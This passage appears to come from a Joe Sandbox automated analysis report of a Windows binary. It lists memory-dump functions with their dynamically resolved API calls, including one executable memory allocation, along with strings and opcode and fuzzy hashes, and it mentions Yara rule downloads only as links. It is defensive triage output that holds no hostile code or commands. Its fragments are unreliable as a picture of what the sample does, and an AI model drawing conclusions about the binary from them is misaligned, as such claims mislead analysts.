                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: msctls_trackbar32
                                                                                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                                                                                              • Opcode ID: 426db9daa25d880842e04d5e2ef77b08fa55b98b90f8021ee9fd550817430f25
                                                                                                                                                                              • Instruction ID: 09e9c6582a8e06fc35bfdeb17629f7b8a76d5b005e0a575795a3ead637f73a39
                                                                                                                                                                              • Opcode Fuzzy Hash: 426db9daa25d880842e04d5e2ef77b08fa55b98b90f8021ee9fd550817430f25
                                                                                                                                                                              • Instruction Fuzzy Hash: 2211E375200208BBEF215F65CC46FE73FA8FF89B54F014118FA55A6090D272A891DB60
                                                                                                                                                                              Function 004D2F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,004D3028,?), ref: 004D2F79
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004D2F80
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RoInitialize$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-340411864
                                                                                                                                                                              • Opcode ID: 17e9319dbd09a53a9fc8eb401870e523996eee7bc4e0afa8b3a422b088c86b0c
                                                                                                                                                                              • Instruction ID: 353955e52a824bfc9d928af7dba3d68e990f8ca3a17b44d9e8d86fb3b068c90c
                                                                                                                                                                              • Opcode Fuzzy Hash: 17e9319dbd09a53a9fc8eb401870e523996eee7bc4e0afa8b3a422b088c86b0c
                                                                                                                                                                              • Instruction Fuzzy Hash: 4EE0C270A94300AADA105B64FD49B167AB4A720706F401425F106E22E0DBB94098FF18
                                                                                                                                                                              Function 004D3034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004D2F4E), ref: 004D304E
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004D3055
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-2819208100
                                                                                                                                                                              • Opcode ID: b78e26925ed519c767e7ba57bf72eedff48ffa737a6d4f1f848ba4b5165cfa28
                                                                                                                                                                              • Instruction ID: 8129a3b47c586f42c1870f28e7172eabea5d6a8613db9c3186397a59161edf67
                                                                                                                                                                              • Opcode Fuzzy Hash: b78e26925ed519c767e7ba57bf72eedff48ffa737a6d4f1f848ba4b5165cfa28
                                                                                                                                                                              • Instruction Fuzzy Hash: D9E092B0644200EBDB615F61BE0DB063AB8B720702F501025F10DE22F0DBF94558FA29
                                                                                                                                                                              Function 0052BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LocalTime__swprintf
                                                                                                                                                                              • String ID: %.3d$WIN_XPe
                                                                                                                                                                              • API String ID: 2070861257-2409531811
                                                                                                                                                                              • Opcode ID: 68272c702728b758ea05e89ad08aabafaaf5b7f1261e3d3012249a38d055ae37
                                                                                                                                                                              • Instruction ID: f62247e1100051567d4c51561461953565157a370e0e1f2835d022e2f456bf09
                                                                                                                                                                              • Opcode Fuzzy Hash: 68272c702728b758ea05e89ad08aabafaaf5b7f1261e3d3012249a38d055ae37
                                                                                                                                                                              • Instruction Fuzzy Hash: 40E01275C0802CEAD754C6D1AD069BA7B7CBF15300F148893BD1692080D7359B58AB22
                                                                                                                                                                              Function 004CE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,004CE6D9,?,004CE55B,0054DC28,?,?), ref: 004CE6F1
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004CE703
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                              • API String ID: 2574300362-3024904723
                                                                                                                                                                              • Opcode ID: 1f28fbeb58b87b2379a67781c5f630b53712b05f0a52261c9f87084376355eb7
                                                                                                                                                                              • Instruction ID: 5b59de5e865ea88702e34319b5654a0961a002fc642659d175537ff0bcaa036a
                                                                                                                                                                              • Opcode Fuzzy Hash: 1f28fbeb58b87b2379a67781c5f630b53712b05f0a52261c9f87084376355eb7
                                                                                                                                                                              • Instruction Fuzzy Hash: D3D05238A00B128BDB602BA2A848A133FF8BB14300F00442EE495D2390DBB8C880CBA0
                                                                                                                                                                              Function 004CE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,004CE69C,75570AE0,004CE5AC,0054DC28,?,?), ref: 004CE6B4
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004CE6C6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                              • API String ID: 2574300362-192647395
                                                                                                                                                                              • Opcode ID: 7a2c4108e49a8052d448c801c2605b4ab9467f1cc61abe9e3bea8318233fe828
                                                                                                                                                                              • Instruction ID: d993cee80cb193692ca2146a59ecd6fa89d5361138abbd317d75594e6deb0824
                                                                                                                                                                              • Opcode Fuzzy Hash: 7a2c4108e49a8052d448c801c2605b4ab9467f1cc61abe9e3bea8318233fe828
                                                                                                                                                                              • Instruction Fuzzy Hash: A7D0A7386107128FD7205F32F809B133AF8BB34301F00542EE445D2360D774C880D664
                                                                                                                                                                              Function 0050EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0050EBAF,?,0050EAAC), ref: 0050EBC7
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0050EBD9
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                              • API String ID: 2574300362-1816364905
                                                                                                                                                                              • Opcode ID: 75544a4d1643bbb67e92880326d3677e5b111faa278993105027ddf89525757a
                                                                                                                                                                              • Instruction ID: bd38d30d58307c34e3368bb26dd4145d6cddf042c980be476891516073e267cc
                                                                                                                                                                              • Opcode Fuzzy Hash: 75544a4d1643bbb67e92880326d3677e5b111faa278993105027ddf89525757a
                                                                                                                                                                              • Instruction Fuzzy Hash: 39D0C7745047129FDB205F75F849A557EFCBB14715F208829F456D23A0DF70DC84DA60
                                                                                                                                                                              Function 004F137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,004F135F,?,004F1440), ref: 004F1389
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 004F139B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                              • API String ID: 2574300362-1071820185
                                                                                                                                                                              • Opcode ID: d02f183684d7adc908fced94e90b0b9b31c23d0a50f4b07a0d2d66385b1d8df8
                                                                                                                                                                              • Instruction ID: ebaf64f3a8d3bc1bd9e2f8e0ecf884b802d8a30726e403f9526175a7e22ae421
                                                                                                                                                                              • Opcode Fuzzy Hash: d02f183684d7adc908fced94e90b0b9b31c23d0a50f4b07a0d2d66385b1d8df8
                                                                                                                                                                              • Instruction Fuzzy Hash: 70D05E348003129FE7200B64E8086523AF4AF24314B05441AE985D2760D674D488E664
                                                                                                                                                                              Function 004F13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,004F1371,?,004F1519), ref: 004F13B4
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 004F13C6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                              • API String ID: 2574300362-1587604923
                                                                                                                                                                              • Opcode ID: 5c603d90bd0edb09299c8c9d7c06700f45de88748e09a64b67926b0bfbebcd66
                                                                                                                                                                              • Instruction ID: 21081039b07df75284270e4c220529981e3a5facb7128cd629dd078d13907d02
                                                                                                                                                                              • Opcode Fuzzy Hash: 5c603d90bd0edb09299c8c9d7c06700f45de88748e09a64b67926b0bfbebcd66
                                                                                                                                                                              • Instruction Fuzzy Hash: BFD0A930804712DFE7240F34F8086127AF8BB50314F00442AEA95D2770DAB8C888DBA0
                                                                                                                                                                              Function 00513ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00513AC2,?,00513CF7), ref: 00513ADA
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00513AEC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                              • API String ID: 2574300362-4033151799
                                                                                                                                                                              • Opcode ID: 9074ecf2a4e3e2ffdc9bf36bd8929ae029da9b963117b64fc276eabeb176b999
                                                                                                                                                                              • Instruction ID: ae7f071e3f54c44ac3638117ce29e7f4b0257583c9aa59ff3a08b8a31874e205
                                                                                                                                                                              • Opcode Fuzzy Hash: 9074ecf2a4e3e2ffdc9bf36bd8929ae029da9b963117b64fc276eabeb176b999
                                                                                                                                                                              • Instruction Fuzzy Hash: DFD092705007139FE7209B65E81969A7AF8BF25715F104429E4D5D2650EAF4C884DAA0
                                                                                                                                                                              Function 004BAA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00506AA6), ref: 004BAB2D
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004BAB49
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper_wcscmp
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 820872866-0
                                                                                                                                                                              • Opcode ID: de29dce9c1256c29cf4f0e5e097eb421cd98d15431310516e652d65e062751b8
                                                                                                                                                                              • Instruction ID: c452ed8bc6a15da0d651c839a9d130da01336ae6dd5daf9ec8e567b8f2685be6
                                                                                                                                                                              • Opcode Fuzzy Hash: de29dce9c1256c29cf4f0e5e097eb421cd98d15431310516e652d65e062751b8
                                                                                                                                                                              • Instruction Fuzzy Hash: EAA12771700106DBDB14DF25E9816AEBBB1FF48300F60416BED56C3290DB389871D7AA
                                                                                                                                                                              Function 00510D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00510D85
                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00510DC8
                                                                                                                                                                                • Part of subcall function 00510458: CharLowerBuffW.USER32(?,?,?,?), ref: 00510478
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00510FB2
                                                                                                                                                                              • _memmove.LIBCMT ref: 00510FC2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3659485706-0
                                                                                                                                                                              • Opcode ID: 1db6619530762f19041a415036d25f1a92f360c919f5a5e3ac3c11216d18de26
                                                                                                                                                                              • Instruction ID: 546f507c582d3a314b5d1c248e17cdf05cbadb8f2020c48da34deb5255077ec6
                                                                                                                                                                              • Opcode Fuzzy Hash: 1db6619530762f19041a415036d25f1a92f360c919f5a5e3ac3c11216d18de26
                                                                                                                                                                              • Instruction Fuzzy Hash: A5B1AF756043008FC704DF29C480AAABBE5FF88714F14896EF8899B391DB75ED86CB95
                                                                                                                                                                              Function 0050AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0050AF56
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0050AF61
                                                                                                                                                                                • Part of subcall function 004F1050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004F10B8
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0050AF6C
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0050B23F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 780911581-0
                                                                                                                                                                              • Opcode ID: 0cedd1bb40fd7970d630f8e4758c9a051ba5152d0b9e7480ee2e97065559ea94
                                                                                                                                                                              • Instruction ID: 1fc258358625c3457c13aa6f3400380a74272f4a9d7ce194f82c0568a1eae578
                                                                                                                                                                              • Opcode Fuzzy Hash: 0cedd1bb40fd7970d630f8e4758c9a051ba5152d0b9e7480ee2e97065559ea94
                                                                                                                                                                              • Instruction Fuzzy Hash: 02A146392046029FD710DF15C891B5EBBE4BF88324F04441EF995AB3A1DB34ED00CB96
                                                                                                                                                                              Function 004D42EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3877424927-0
                                                                                                                                                                              • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                                                                              • Instruction ID: 0fdffced7ad590d749617e89cad920432d520489334dab08fc18210325794b06
                                                                                                                                                                              • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                                                                              • Instruction Fuzzy Hash: E651D630B003059BDF249FAD88A06AF77A1AF81324F24872FFC65967D0D7789D919B49
                                                                                                                                                                              Function 0051C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0051C354
                                                                                                                                                                              • ScreenToClient.USER32(?,00000002), ref: 0051C384
                                                                                                                                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0051C3EA
                                                                                                                                                                              Memory Dump Source
